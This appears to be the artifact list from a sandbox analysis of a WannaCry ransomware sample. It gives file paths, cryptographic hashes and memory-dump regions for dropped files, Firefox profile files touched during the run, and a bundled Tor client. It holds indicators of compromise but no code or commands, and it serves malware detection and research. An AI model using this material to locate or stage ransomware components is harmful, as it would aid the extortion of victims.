SHA512 ffa863d5d6af4a48aadc5c92df4781d3aacbf5d91b43b5e68569952ffec513ff95655b3e54c2161fe27d2274dd4778bad517c7a3972f206381ef292808628c55

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp

MD5 65690c43c42921410ec8043e34f09079
SHA1 362add4dbd0c978ae222a354a4e8d35563da14b4
SHA256 7343d5a46e2fca762305a4f85c45484a49c1607ede8e8c4bd12bedd2327edb8d
SHA512 c0208d51cf1586e75f22764b82c48ecbb42c1ff54aa412a85af13d686e0119b4e49e98450d25c70e3792d3b9c2cda0c5ab0c6931ebaf548693bb970a35ae62b9

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs-1.js

MD5 ed0d39374817d98361c50ac217abeed5
SHA1 00d0ca72a80fb571a46868e63a676daa1f5a881e
SHA256 27d66f2b9b52714f079295da5540fce00b03ecdd27fa9386dbd9fa43a3106221
SHA512 206bec5532011b3871782db2c917fa1f5931e661c34ca0872bad3b5635f51cfa75675b61f3d6530201748aefd42a177de20464005e91f556b2c7674a32743b3e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp

MD5 e6c20f53d6714067f2b49d0e9ba8030e
SHA1 f516dc1084cdd8302b3e7f7167b905e603b6f04f
SHA256 50a670fb78ff2712aae2c16d9499e01c15fddf24e229330d02a69b0527a38092
SHA512 462415b8295c1cdcac0a7cb16bb8a027ef36ae2ce0b061071074ac3209332a7eae71de843af4b96bbbd6158ca8fd5c18147bf9a79b8a7768a9a35edce8b784bf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore.jsonlz4

MD5 7ee5a4ebd367e6ae57468edb9d309e53
SHA1 08fb2dc7d2a4981ced5284d4f60107b416060651
SHA256 ea352fcf99131dc7628a51906329899b0c683e71563ae034ff929ea191250c30
SHA512 8599cb2d7bbea75169713ac63ae472ab14cdb374aa926a6eb4093b7e23c6f856abfce7eb556e692309860c63fee57b78c1e77be41e3000699ae0e8c01ba3f461

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\xulstore.json.tmp

MD5 1995825c748914809df775643764920f
SHA1 55c55d77bb712d2d831996344f0a1b3e0b7ff98a
SHA256 87835b1bd7d0934f997ef51c977349809551d47e32c3c9224899359ae0fce776
SHA512 c311970610d836550a07feb47bd0774fd728130d0660cbada2d2d68f2fcfbe84e85404d7f5b8ab0f71a6c947561dcffa95df2782a712f4dcb7230ea8ba01c34c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\places.sqlite

MD5 7e52267e294ce61a87a97fcb5ce55a26
SHA1 333a1a9681c874cd026f41512f8574c04cfb88f5
SHA256 bba0368915c7debe6ae1a6f55d6e83527472661dd755b2eed6e81f31cde0f9e5
SHA512 022dde657c1ab98607935f65d37e6517affec2dd44e4b526feca8baad85a0bc8915c7330a0f5fbb4e9f2d98c52654cf5086d5d33b2436cb01156b222af293821

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\msg\m_finnish.wnry

MD5 35c2f97eea8819b1caebd23fee732d8f
SHA1 e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA256 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

memory/1292-1224-0x0000000010000000-0x0000000010010000-memory.dmp

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

MD5 7bf2b57f2a205768755c07f238fb32cc
SHA1 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256 b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA512 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

MD5 7a2726bb6e6a79fb1d092b7f2b688af0
SHA1 b3effadce8b76aee8cd6ce2eccbb8701797468a2
SHA256 840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5
SHA512 4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\@[email protected]

MD5 f7c8b8b4247369e249daaea1ff17cce5
SHA1 8b255c168725fff9d518d1c393ae3508b57ff675
SHA256 716f0afbfe75c8976529d7dbc490e5f8fd0f9b7be9f13e188142d5617f3fdf84
SHA512 07387f82ea88167b90435dc134a68cdc3cf517fdfb8482f1ddf36bd34f29d60539c7a2c36d3fc297bd83f29399750be7f497cff89edc8c60ec6730dd9140ac70

C:\Users\Default\Desktop\@[email protected]

MD5 c17170262312f3be7027bc2ca825bf0c
SHA1 f19eceda82973239a1fdc5826bce7691e5dcb4fb
SHA256 d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
SHA512 c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\TaskData\Tor\tor.exe

MD5 fe7eb54691ad6e6af77f8a9a0b6de26d
SHA1 53912d33bec3375153b7e4e68b78d66dab62671a
SHA256 e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb
SHA512 8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

memory/5096-2586-0x0000000072C90000-0x0000000072D12000-memory.dmp

memory/5096-2589-0x0000000072BC0000-0x0000000072BE2000-memory.dmp

memory/5096-2588-0x0000000072910000-0x0000000072992000-memory.dmp

memory/5096-2587-0x00000000729A0000-0x0000000072BBC000-memory.dmp

memory/5096-2590-0x0000000001060000-0x000000000135E000-memory.dmp

memory/5096-2594-0x0000000072C90000-0x0000000072D12000-memory.dmp

memory/5096-2599-0x0000000072910000-0x0000000072992000-memory.dmp

memory/5096-2598-0x00000000729A0000-0x0000000072BBC000-memory.dmp

memory/5096-2597-0x0000000072BC0000-0x0000000072BE2000-memory.dmp

memory/5096-2596-0x0000000072BF0000-0x0000000072C67000-memory.dmp

memory/5096-2595-0x0000000072C70000-0x0000000072C8C000-memory.dmp

memory/5096-2593-0x0000000001060000-0x000000000135E000-memory.dmp

memory/5096-2603-0x0000000001060000-0x000000000135E000-memory.dmp

memory/5096-2619-0x00000000729A0000-0x0000000072BBC000-memory.dmp

memory/5096-2614-0x0000000001060000-0x000000000135E000-memory.dmp

memory/1972-2627-0x0000000000160000-0x000000000016E000-memory.dmp

memory/1972-2628-0x0000000004FB0000-0x00000000054AE000-memory.dmp

memory/1972-2629-0x0000000004B50000-0x0000000004BE2000-memory.dmp

C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

MD5 6700e499687c2d4d29fd12ed96c5fc3e
SHA1 0da3429fd52193afe9b33199d1e0d67ba2233489
SHA256 067511028460a92c0fb2631ce3d838fa499cd32c525e1777e0f0c2fbab87e492
SHA512 06ca2464916553067ba5579f19a5d03b0e8c39cfacfcca3697b0d36ba8e5433296b87188572beb09ccdc09f2a38d2facec2a34e74c33542cdb3c42d649d1fc0a

memory/1972-2637-0x0000000004B10000-0x0000000004B1A000-memory.dmp

memory/5096-2650-0x0000000001060000-0x000000000135E000-memory.dmp

memory/5096-2655-0x00000000729A0000-0x0000000072BBC000-memory.dmp

memory/5096-2657-0x0000000001060000-0x000000000135E000-memory.dmp

memory/5096-2707-0x0000000001060000-0x000000000135E000-memory.dmp

memory/5096-2719-0x0000000001060000-0x000000000135E000-memory.dmp

memory/5096-2728-0x0000000001060000-0x000000000135E000-memory.dmp